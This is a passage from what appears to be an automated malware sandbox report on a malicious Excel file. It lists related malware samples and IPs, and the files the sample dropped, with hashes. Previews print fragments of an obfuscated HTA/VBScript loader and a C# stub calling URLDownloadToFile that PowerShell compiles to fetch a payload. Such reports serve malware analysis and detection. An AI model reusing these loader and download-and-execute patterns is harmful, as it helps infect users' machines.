                                                                                                    • 142.250.184.206
                                                                                                    SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    odthings.docGet hashmaliciousRemcosBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    na.docGet hashmaliciousMassLogger RATBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    mnobizxv.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    withbest.docGet hashmaliciousRemcosBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    transferencia interbancaria_667553466579.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 142.250.185.97
                                                                                                    • 142.250.184.206
                                                                                                    7dcce5b76c8b17472d024758970a406bST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    ST007 SWIFT CONFIRMATION.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    Transferencia.docGet hashmaliciousQuasarBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    SecuriteInfo.com.Other.Malware-gen.29374.9055.xlsxGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    SecuriteInfo.com.Exploit.CVE-2017-0199.05.Gen.16537.13180.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    care.rtfGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    Purchase order.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    Payment Advice.xlsGet hashmaliciousLokibotBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    Credit_Details2251397102400024.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191
                                                                                                    Pro_Inv_24102024_payment_confirmations_SWIFTFiles.xlsGet hashmaliciousUnknownBrowse
                                                                                                    • 172.67.162.95
                                                                                                    • 104.21.74.191

                                                                                                    Dropped Files

                                                                                                    No context

                                                                                                    Created / dropped Files

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4742
                                                                                                    Entropy (8bit):4.8105940880640246
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                    MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                    SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                    SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                    SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                    Malicious:false
                                                                                                    Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):0.34726597513537405
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Nlll:Nll
                                                                                                    MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                    SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                    SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                    SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                    Malicious:false
                                                                                                    Preview:@...e...........................................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].hta

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):134307
                                                                                                    Entropy (8bit):2.5238696038375625
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:4vCt72QeBoCn7iY1opReQiY7ERPI/T5eodWQ:4vCF2QeaCmsoMY7MnAWQ
                                                                                                    MD5:07A93908C3113536577C9C5B734A0AF0
                                                                                                    SHA1:794AF14EC431E796CA6B61ED2094F623B86D77A9
                                                                                                    SHA-256:809E92422295976379070A5F2BB56313CA401B52D78B5D78134A08FCFD781202
                                                                                                    SHA-512:34EF8170D518AFBF42BC16A0759F3609153338E6E4BBC1CE05E94933E13CE4F6C1C8F5DE7AEDFE5F675311F593D5CBE377908815922D55A076EAA7C35493BA79
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicelookgirlfrinedonmyheartshegoodforbestthignstodoforme[1].hta, Author: Joe Security
                                                                                                    Preview:<script language=JavaScript>m='%3Cscript%3E%0A%3C%21--%0Adocument.write%28unescape%28%22%253Cscript%253E%250A%253C%2521--%250Adocument.write%2528unescape%2528%2522%25253C%252521DOCTYPE%252520html%25253E%25250A%25253Cmeta%252520http-equiv%25253D%252522X-UA-Compatible%252522%252520content%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CscRIPT%252520LAnGUAge%25253D%252522vbsCriPT%252522%25253E%25250Adim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%25

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethebestthingswithgoodthingsforgetmebackwithbestthings[1].tiff

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):140614
                                                                                                    Entropy (8bit):3.697292806385226
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:OSbtgt5p/GwRG5nFk0L0kTg/fGnuo9bz4H8k1:uKG/fGnuop0H1
                                                                                                    MD5:BF515F00DF29B4BE31AC6E43AB05CD88
                                                                                                    SHA1:29073164D5FDFD336C332321EBD8C01920438A8B
                                                                                                    SHA-256:50B9F7F3880E858AC733E7A7FB6B679E699C8BC9553948D04B2C15194B7520DC
                                                                                                    SHA-512:6EBB327DE4FD7DC7D348EC32C7D7CC9D79BD2753FAE2E29F7910E27D52091C6765E6EC6C0E982156661E9B80FE223C831CC739956624EF66262ADFFA1174ADA7
                                                                                                    Malicious:false
                                                                                                    Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .l.a.b.r.o.s.o.)..... . . . .d.i.m. .p.a.n.e.t.e.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .p.a.n.e.t.e..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .p.a.n.e.t.e.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .=. .0..... . . . .p.r.o.x.y.A.u.t.h.

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\170CE6A6.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):38272
                                                                                                    Entropy (8bit):2.8081661079517968
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:6/CJoV9KjGhFi1lildmP/4GtXULs9h2QmlC+a6gz5nCf5OBgJP+SKA:6/CbiG1l34GtXl2QmlC+a6gz5SOyJ1/
                                                                                                    MD5:1ED1E7A0ED6137C48652115CA579221E
                                                                                                    SHA1:B66C7110A3831166B32E3664AAF24AB75C0CCCA1
                                                                                                    SHA-256:A694409B40BB7B2DFC78BE6C7ECDFC4F6A8B95305247EB520C57F9E0B1BBFDC3
                                                                                                    SHA-512:93D917CEAD84FF6792723B2238A342F995A3AF8DD0003DA8298BB04F5A6D53F0C6EC7728D6EE51933BEBA015969EAD8C25F8566E6DC2CEE4EBF931F2422F25AE
                                                                                                    Malicious:false
                                                                                                    Preview:....l...........c................N...@.. EMF........l.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d......."...........!...............................................d.......'.......................%...........................................................L...d...........c...............d.......!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\422C7D55.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1462180
                                                                                                    Entropy (8bit):4.432116325040296
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                                    MD5:C88BBA4F839966D6648736A889FC1572
                                                                                                    SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                                    SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                                    SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                                    Malicious:false
                                                                                                    Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\78CC02D8.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):52712
                                                                                                    Entropy (8bit):2.69601862257325
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:k37ZSy7s8wsI459Fwh+zRrXheOV8OV8OV1lJ//Te7rP:y7blMOV93WrP
                                                                                                    MD5:57851611F066C7BD325A4B9817DD28B0
                                                                                                    SHA1:A52AE733137921018D9670ABB919568CD5F90F2F
                                                                                                    SHA-256:EE958A9DEF0CA8010229635A73E8F3621A234CAEE58EE7C6DF8CFE128490B139
                                                                                                    SHA-512:A6B5D475F1247988B9139F2586D210FF0741203B398F7FB2CF8CB1C7C39250C52982954F81F576FF765E2561A3462078A173EA35749C1DDEF55FC99BD4918C85
                                                                                                    Malicious:false
                                                                                                    Preview:....l............................S...".. EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.................P.....%.....................P.....................................L...d.......<.......m.......<.......2...!..............?...........?................................R...p.................................. C.a.l.i.b.r.i...........................................

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B29634F9.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):172076
                                                                                                    Entropy (8bit):3.1342558498505824
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:7DqEuvAIid/aQGb1BfUErpxTORWEl+tIL22EZCd:iEuWd/adDrvTUP22Bd
                                                                                                    MD5:D85DAC1376E45C58F790BD50C2729F6C
                                                                                                    SHA1:5BD339C54A944689935652E4A1CC78961EB19589
                                                                                                    SHA-256:CE5CF5334F2BF26B0B3F4B135B2BEA9126CB29DD1C5BED1F558FAA2BFE4C8E48
                                                                                                    SHA-512:6B864B3E47331C5C37376B1F9ED7FE1F8D48BE27438DE9C4D7BA3B3ED6ED3F319425E8D696B51C7969AD3C10A7285D7212E59FDDAC8385BCD992A03EF189789A
                                                                                                    Malicious:false
                                                                                                    Preview:....l..............................eQ.. EMF....,.......$...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........T...)..............."...!..............?...........?................................'.......................%...................................&...........................%.......

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D5C3DA6F.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):349384
                                                                                                    Entropy (8bit):3.7170605169628734
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:6dkVZD+Jb5qGYJ6OoG+RJ2dB9eJb85eKJBFgcxSoigiP/l5K:UkVZD+JbBYJhkRJiTeJI8KJcs/ibY
                                                                                                    MD5:4491EFDD2921740B529E96BD780D0644
                                                                                                    SHA1:A170615106A550A873E2FD78D913FA02264B1D19
                                                                                                    SHA-256:2873A34503AFAFA73B48AB4C63CB00D14D209C24A704F6BBE92D5D9EA40BE538
                                                                                                    SHA-512:FEFE0B18BD15EB774F42056EB9E39FD8BFF8DDEF76595E5EFEC9A76117D173513FFCFCF79A45ACDECD4F714DBC6E95EDB813AF610F19C96E1595D72DC7FDE707
                                                                                                    Malicious:false
                                                                                                    Preview:....l...........'....................S.. EMF.....T..S.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(......."...........!...............................................(.......'.......................%...........................................................L...d...........=...............<.......!..............?...........?................................'......................%...........(......................L...d...........F...............G...

                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4181773.emf

                                                                                                    Download File
                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1462180
                                                                                                    Entropy (8bit):4.432116325040296
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:rQelSzQ4mD3f5ReZdZJElOFmxi9DrvwdkfDxdYJhvRJiTeJ78KJcj/iiDmdYJhkG:rVlS5mzCJEuPukZBV
                                                                                                    MD5:C88BBA4F839966D6648736A889FC1572
                                                                                                    SHA1:6BC7FD238EB8563236B3E0049CFA9849DFC7A71B
                                                                                                    SHA-256:49497513E15B13BD704C26CBE555D5F0A68F77203C59E500025BBC719366296D
                                                                                                    SHA-512:0149FB22DD6E3530EEE015A978E4D99C6DBE6FE70C508C6CCFF735B875B0DE97B06BD9878C9E871A3EFBF2429640329A9CD80DE790CB80CB8364700333D5A571
                                                                                                    Malicious:false
                                                                                                    Preview:....l...............2...........@m..?... EMF.....O...,..A...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

                                                                                                    C:\Users\user\AppData\Local\Temp\0a03xgcw.2es.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\1eoqqzjn.mtx.psm1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\1mwbfhwc.pdt.ps1

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1

                                                                                                    C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.0.cs

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (343)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):462
                                                                                                    Entropy (8bit):3.939691802887259
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:V/DsYLDS81zu0k9dl5mM+TQXReKJ8SRHy4HmukGrkQKRF/kbsLiwHQy:V/DTLDfuldl5bXfHitGtKEsLiwHQy
                                                                                                    MD5:BF57B8E732D7B6222960BF1D5DD5DF18
                                                                                                    SHA1:0CDA321126A9876C2881199B2940C05492B0D94F
                                                                                                    SHA-256:F77463E3272AF620BC1620C10233F07A3E1C43B77D053A3477A92579B912CCFC
                                                                                                    SHA-512:9ED1F51736815946772533E380020B0DE4C449AAA72DB6B2CE29D7EAB458216DD8FA9B9333A07164C72290D758412DCBAB51099DA031ED465EE62F73A14CFABB
                                                                                                    Malicious:false
                                                                                                    Preview:.using System;.using System.Runtime.InteropServices;..namespace HUVx.{. public class knXlEwKrnwQ. {. [DllImport("uRLMoN.DlL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr Nbxm,string LmAkPDnea,string bfnYdb,uint zsWSAW,IntPtr AXG);.. }..}.

                                                                                                    C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.cmdline

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):369
                                                                                                    Entropy (8bit):5.234536562088693
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2P23fqHxd+Uzxs7+AEszIP23fqHxda9:p37Lvkmb6KzAdxWZEoAda9
                                                                                                    MD5:A33AC3D682289D6FA01FDA691DB303A7
                                                                                                    SHA1:125227B2B09C734C6D7D797BFAAF21E0A546103E
                                                                                                    SHA-256:77BDACB981F5189A651597EC1D5BD4076A94AEBE13B12A01EE59B10081AEBA03
                                                                                                    SHA-512:368DA0371F8FA725FE8C46BFCCAE9DD46376EED4CB21A7B0EBCCAA285D95B12572F8AAD99C6462A78189CE80640428DEDB750A480AC940A070CE9E6FF12C69F8
                                                                                                    Malicious:true
                                                                                                    Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.0.cs"

                                                                                                    C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.dll

                                                                                                    Download File
                                                                                                    Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3072
                                                                                                    Entropy (8bit):2.829057947902296
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:etGSIPBe5ekrl88NickawfRZSk64tkZfq2PbCZ0WI+ycuZhNkakSgPNnq:63skr+4ygkCJq2PbCZX1ulka34q
                                                                                                    MD5:EB1378325678A92A50AAE2C8AA342E7C
                                                                                                    SHA1:B25B2B8A32ADC85F8D7A4F1B4284F3375A92F62B
                                                                                                    SHA-256:D6843532B81F245837B582AE563A347E7CD9002AC341D6738CEAA21320A6EAB4
                                                                                                    SHA-512:7283603DDB4BC2113F7BE73890BBDFFE21F05323040DFFC1453A8B9F0B066316684C22B4BD64CD84AEA3D0C780297A8ECD04FE1F93D32253EAB7543EDB0DFC87
                                                                                                    Malicious:false
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..... g...........!.................#... ...@....... ....................................@.................................\#..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................8.1.....x.....x...........................#.............. ?.....P ......Q.........W.....\.....f.....m.....t...Q.....Q...!.Q.....Q.......!.....*.......?.......................................(..........<Module>.1n

                                                                                                    C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.out

                                                                                                    Download File
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):866
                                                                                                    Entropy (8bit):5.337325738534447
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:AId3ka6KzAYEoA04KaMD5DqBVKVrdFAMBJTH:Akka60AYEoA04KdDcVKdBJj
                                                                                                    MD5:0EBABA8A72E8C28FE3B6837AA1E5A5E6
                                                                                                    SHA1:D61DE40E93C9E3EFFB02E079E5C33CBC0A4E34CA
                                                                                                    SHA-256:F37706F9947A94C5C8DAF8B94143FB673E384B6928361869EC9349EE11238CF2
                                                                                                    SHA-512:B33C845AE8E1ECBA69FA0B8A961F98846E5B6A9C3925B584D350C465E2A3F9341A7AF9125B6E7343434717245B1430C5C1C5E0E02C87764DA7A12DEDFFB59C96
                                                                                                    Malicious:false
                                                                                                    Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1nxbdaco\1nxbdaco.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                                    C:\Users\user\AppData\Local\Temp\1nxbdaco\CSCDA0B5C0F54B64E9AA66FC6FE2D4D8162.TMP

                                                                                                    Download File
